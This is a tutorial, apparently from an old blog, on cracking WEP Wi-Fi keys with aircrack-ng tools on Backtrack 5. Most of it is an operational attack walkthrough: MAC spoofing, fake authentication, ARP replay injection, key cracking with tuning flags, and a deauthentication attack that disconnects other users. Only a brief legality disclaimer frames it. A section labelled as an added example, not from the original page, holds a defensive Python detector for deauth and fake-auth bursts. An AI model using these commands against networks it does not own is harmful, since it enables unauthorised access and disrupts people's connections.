Cracking WEP with Backtrack 5

This is the old-school way, command line only. Nowadays Backtrack includes a pretty cool program called gerix wifi cracker. It makes things ridiculously easy and doesn't really need any explanation; there are plenty of YouTube videos about it. For the time being, here's the manly man's masculine way to do it:

1.) Start monitor mode:

airmon-ng

Copy down the interface name, then run:

airmon-ng start (interface)

If it says "mon0" or "wifi0" is used, this is your new interface

If it says other things are running, type "kill (PID#)" for each

2.) Injection test:

aireplay-ng -9 (interface)

The APs that send pings back can be injected

Copy down your target's BSSID, channel & ESSID

aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)

This tests one specific AP, which can be useful for verifying hidden SSIDs or alternative BSSIDs

3.) Target a specific channel:

airmon-ng start (interface) (channel)

4.) Change MAC:

airmon-ng stop (interface)

ifconfig (interface) down

macchanger --mac (faked:mac) (interface)

Copy down faked:mac

5.) Begin packet capture:

airodump-ng -c (channel) -w (dump-name) --bssid (BSSID) (new interface)

Keep an eye out for authenticating clients' MACs under Station

If one is found & step 6 isn't going well, go back to step 4 and use that MAC

You may have to stop the monitoring interface & the physical one

6.) Fake authentication:

  • Run in a second shell:

aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)

Successful authentication will continually send keep-alive packets

Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help with picky routers



7.) ARP replay:

  • Run in a third shell:

aireplay-ng -3 -b (BSSID) -h (faked:mac) (interface)

8.) Crack WEP key:

  • Run in a fourth shell:

aircrack-ng -b (BSSID) (dump-name)-01.cap

A minimum of around 10,000 to 20,000 IVs is needed to crack a 64-bit key & about 40,000 to 85,000 for a 128-bit key

Try "aircrack-ng -n 64 (dump-name)*.cap" every 10,000 IVs

If you know the start of the key in hexadecimal, try running with "-d #" where # is the beginning characters

If the key bytes are all numbers, try running with "-t" to assume an all-numeric key

Add -x2 to brute force the last 2 bytes

If you reach 2,000,000 IVs without success, try changing the fudge factor to "-f 4" & run for 30 minutes to an hour

If that's unsuccessful, retry with the fudge factor increased by 4 more

If the key bytes all start with similar numbers, try running with "-h" to assume an all-ASCII key

Add -x if trying with very few IVs, to prevent brute forcing the last 2 bytes


  • Other attack methods:

Injection attack with 2 wireless cards:

aireplay-ng -9 -i (receiving interface) (injecting interface)

If it fails on Attack -5, make sure the injection interface's MAC matches the current card MAC

Deauthentication attack:

aireplay-ng --deauth 5 -a (BSSID) -c (faked:mac) (interface)

Can be faster than an ARP replay, but you must know the MAC of an authenticated client who is currently online

This will disconnect the authenticated client, so they may become suspicious
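
Both the fake authentication of step 6 and the deauthentication attack above show up on the air as a burst of management frames between one station and one BSSID, which is what a wireless IDS keys on. As an added example that is not part of this tutorial, here is a defender-side Python detector that flags those bursts in a constructed management-frame log (the log format, the MAC addresses and the thresholds are all assumptions):

```python
# Added example, not from the original page: a defender-side detector for the
# deauth-flood and fake-auth patterns above. Log lines are "<seconds> <subtype>
# <bssid> <station>"; format, MACs and thresholds are assumptions, frames constructed.
from collections import defaultdict
SAMPLE_LOG = """\
0.0 deauth 00:11:22:33:44:55 aa:bb:cc:dd:ee:01
0.2 deauth 00:11:22:33:44:55 aa:bb:cc:dd:ee:01
0.4 deauth 00:11:22:33:44:55 aa:bb:cc:dd:ee:01
0.6 deauth 00:11:22:33:44:55 aa:bb:cc:dd:ee:01
0.8 deauth 00:11:22:33:44:55 aa:bb:cc:dd:ee:01
10.0 auth 00:11:22:33:44:55 aa:bb:cc:dd:ee:02
10.1 auth 00:11:22:33:44:55 aa:bb:cc:dd:ee:02
10.2 auth 00:11:22:33:44:55 aa:bb:cc:dd:ee:02
10.3 auth 00:11:22:33:44:55 aa:bb:cc:dd:ee:02
10.4 auth 00:11:22:33:44:55 aa:bb:cc:dd:ee:02
10.5 auth 00:11:22:33:44:55 aa:bb:cc:dd:ee:02
10.6 auth 00:11:22:33:44:55 aa:bb:cc:dd:ee:02
10.7 auth 00:11:22:33:44:55 aa:bb:cc:dd:ee:02
95.0 deauth 00:11:22:33:44:55 aa:bb:cc:dd:ee:03
"""

def parse_frames(text):
    """Yield (seconds, subtype, bssid, station) for each non-empty log line."""
    for line in filter(None, text.splitlines()):
        t, subtype, bssid, station = line.split()
        yield float(t), subtype, bssid, station

def detect_bursts(frames, subtype, window_s, threshold):
    """Return {(bssid, station): peak} for pairs whose `subtype` frames reach
    `threshold` inside some sliding window of `window_s` seconds."""
    times = defaultdict(list)
    for t, st, bssid, station in frames:
        if st == subtype:
            times[(bssid, station)].append(t)
    alerts = {}
    for key, ts in times.items():
        ts.sort()
        start, peak = 0, 0
        for end, t in enumerate(ts):
            while t - ts[start] > window_s:  # drop frames that fell out of the window
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[key] = peak
    return alerts

def detect_deauth_flood(text, window_s=10.0, threshold=5):  # deauth attack signature
    return detect_bursts(parse_frames(text), "deauth", window_s, threshold)
def detect_auth_burst(text, window_s=60.0, threshold=8):  # repeated fake-auth signature
    return detect_bursts(parse_frames(text), "auth", window_s, threshold)
```

A single deauth to a station (the last sample line) is normal roaming and stays below the threshold; only the sustained burst against one client, or the repeated authentication attempts from one station, raise an alert.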

Fair warning

Depending on where you are on this beautiful planet, connecting to someone else's wifi may or may not be entirely legal. The instructions above are merely for educational purposes (one can always test the security, or lack thereof, of one's own network). As mentioned at the beginning, this was the manly man's way. For the girly sissy way, go to YouTube and look up gerix-wifi-cracker. It's made everything way easier. :)